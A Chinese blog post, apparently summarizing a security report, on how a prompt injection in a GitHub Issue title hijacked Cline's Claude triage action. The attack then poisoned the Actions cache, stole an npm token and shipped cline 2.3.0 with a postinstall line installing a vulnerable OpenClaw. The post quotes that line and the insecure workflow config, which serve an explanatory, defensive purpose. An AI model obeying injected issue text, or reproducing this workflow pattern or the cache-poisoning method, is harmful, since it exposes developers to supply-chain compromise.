当前位置：首页 > article >正文

一个 GitHub Issue 标题如何让 4000 台电脑沦陷？

article 2026/3/19 9:53:43

此系列并非原文的死板翻译而是我经过理解和提炼后的输出。仅聚焦其中最有意思和有价值的部分。想了解所有细节的小伙伴可以去原文查看完整内容。试想一下你只是像往常一样打开电脑写代码但你的 npm publish token 却已经被黑客窃取了——而这一切的罪魁祸首竟然只是某人在某个开源项目里提了一个 GitHub Issue这听起来像是天方夜谭但它却真实地发生在了 AI 编程助手Cline身上。背景一颗名为 OpenClaw 的“子弹”在 2026 年 2 月 17 日有人悄悄发布了cline2.3.0。这个版本表面上波澜不惊仅仅在package.json中添加了一句不起眼的脚本postinstall: npm install -g openclawlatest不过这里被安装的“龙虾”OpenClaw并不是今天的主角它只是这次攻击中被黑客利用的一把枪。当时的 OpenClaw2026.1.29 版本之前存在一个极其严重的身份验证绕过漏洞CVE-2026-25253CVSS 评分高达 8.8。简单来说任何人都可以通过跳过握手过程中的 scopes 字段直接以最高权限的“操作员”身份连接完全不需要令牌Token。而 OpenClaw 本身对系统的权限极大这就意味着你环境变量中的各种敏感数据瞬间成了黑客的囊中之物。整个恶意包存活了短短 8 小时却被下载安装了大约 4000 次。最让人拍案叫绝的是这场攻击的入口——黑客仅仅通过自然语言利用 GitHub Issue 的标题就完成了一次完美的“提示词注入Prompt Injection”攻击。攻击过程教科书级的供应链投毒原文 1 整理了非常完整的攻击链路图这里借着图片带大家重新梳理一下这个精妙的过程1. GitHub Issue 注入祸从口出首先Cline 仓库使用 Anthropic 官方的claude-code-action来进行 Issue 的自动化分类它会自动读取用户提的问题、添加对应的标签等。它的配置是这样的allowed_non_write_users: * claude_args: - --allowedTools Bash,Read,Write,Edit,Glob,Grep,WebFetch,WebSearch prompt: | **Issue:** #${{ github.event.issue.number }} **Title:** ${{ github.event.issue.title }}稍微对权限和安全敏感的朋友看到这里可能已经倒吸一口凉气了。这里存在三个致命问题任何 GitHub 用户都可以创建 Issue毫无门槛。Claude Action 的权限给得太大了它不仅有读权限甚至还有写文件和运行 Bash 命令的权限。GitHub Issue 的标题被直接拼接到了 prompt 配置中其中第三点正是这次攻击的“命门”。由于直接把外部不可信的输入Issue 标题喂给了 AI这就给了黑客进行提示词注入的绝佳机会。配合上第二点里过大的工具权限黑客只要在标题里写上一段“自然语言命令”AI 就会乖乖去执行。2. GitHub Actions 缓存污染偷梁换柱提示词注入只是第一步。毕竟上一步受控的只是个 Issue 分类工具它是怎么影响到 NPM 发包的呢这一步才是真正精妙的操作。Cline 的发布工作流为了加速使用了node_modules缓存- name: Cache root dependencies uses: actions/cachev4 id: root-cache with: path: node_modules key: ${{ runner.os }}-npm-${{ hashFiles(package-lock.json) }}在 GitHub Actions 上每个仓库都有一个共享的缓存池最大 10GB。当缓存池被填满后旧的缓存就会被系统自动擦除。这就好比一个公共储物柜Cache 池满了黑客故意塞满一堆垃圾把原本主人的东西挤出去然后偷偷放进一个长得一模一样、但里面装了炸弹的假包裹篡改后的node_modules。在这个例子中Issue 检测和发布的 Action 共用同一个缓存池。攻击者通过提示词注入命令 AI 疯狂向缓存写入大量垃圾数据迫使 GitHub 清除了旧的合法缓存。随后攻击者再写入一个新的缓存 Key而这个 Key 指向的正是他们提前篡改过的恶意node_modules当 Cline 的维护者触发正常的发布 Action 时工作流就会毫无防备地从缓存中拉取那个带有后门的node_modules。最终攻击者在发布环境里如鱼得水轻松窃取了环境变量中的 NPM Publish Token。3. 恶意版本发布收网到了这一步一切水到渠成。黑客拿着第二步窃取到的 NPM Token光明正大地发布了带有恶意postinstall脚本的cline2.3.0版本。Cline 的“草台班子”应对其实这个漏洞早在2025 年 12 月下旬就已经被安全研究员 Adnan Khan 发现并通过 GitHub 的安全公告Security Advisory上报给了官方。但令人无语的是Cline 方面似乎并没有引起足够的重视一直没有实质性动作。直到 2 月 9 日 Khan 彻底公开了漏洞细节Cline 方面才开始进行修复和 Token 的轮换。然而最戏剧性的一幕来了Cline 方面居然删错了 Token由于被窃取的旧 Token 有效期足够长且没有被真正吊销黑客最终还是成功利用它发布了恶意包。从去年 12 月下旬初次上报到 2 月中旬事发中间足足有 2 个多月的空窗期。如果 Cline 团队稍微重视一点安全问题这场波及 4000 台机器的供应链攻击完全是可以避免的。这里不得不提一下我们公司在安全方面的响应速度了。有时候虽然看起来有点“小题大做”但遇到这类安全报告真的是会第一时间停下手头其他事情集中精力去排查和复盘的。安全无小事啊总结与启示1. 警惕“自然语言”的注入攻击这个事件给我最大的感受是AI 时代的安全边界正在被重塑。如果你的产品接入了 AI那么在任何涉及 AI 处理的输入框里你不仅要防范传统的 XSS、SQL 注入更要时刻警惕**自然语言的提示词注入Prompt Injection**攻击。未来的网络安全工程师可能真的要开始学写 Prompt 防御策略了。

一个 GitHub Issue 标题如何让 4000 台电脑沦陷？

相关文章：

一个 GitHub Issue 标题如何让 4000 台电脑沦陷？

经理结算记录分页

集成产品知识库，AI自动应答+人工无缝衔接的全渠道微信智能客服系统源码

金智维Ki-Agent平台如何打造“会思考”的数字员工？

COMSOL专业模型在激光熔覆与选区熔融仿真中的应用

深度剖析SWAP模型，从SWAP模型源代码编译到AI大语言模型辅助建模

sdut-python-实验二-程序流程控制（1-10）

# 金丝雀发布实战：用 Go 实现渐进式流量灰度部署在微服务架构日益普及的今天，**如何安全、可控地发布新版

贵州棒球特长生认证路径·棒球1号位联盟

知识付费SaaS选型攻略：为何创客匠人成为行业首选

“35岁红线”终于松了！多所高校官宣：45岁博士仍可进编

华为OLT智能管理工具：图形化配置替代命令行，零代码完成开局部署

顶流集结，分享出海实战真经！出海大会终极剧透！

OpenClaw 调用 Claude Code和Codex

Nature Microbiology | 效应蛋白-宿主相互作用组图谱将健康肠道微生物组中的III型分泌系统与免疫调节联系起来

网站流量从哪来？手把手教你安装百度统计 + Google Analytics（2026）

hLife Collection | Viruses （Part Ⅱ)

中国龙虾ai软件有哪些选择？2026自动化选型指南

OpenClaw到底是啥？能做什么？怎样部署？一文讲懂！

MySQL不使用子查询的原因

荣事达3.18榜上产品 AI智能养生壶功能介绍

@SpringBootApplication 与 SPI 机制的终极解密

1.2指令系统-存储系统-cache

水厂、电站、化工厂用的闸阀一样吗？

S7-1200 PLC 高级语言SCL数控G代码功能块源文件

新概念英语第一册037_Making a bookcase

【AI】创建 claude code cli 风格的欢迎界面

【网络安全入门】一文讲透：核心属性、主流攻击手法与防御体系

OpenClaw：新一代AI Agent开发平台，让聊天更智能

不断提升维修技能是医疗器械维修工程师职业发展更好的必要条件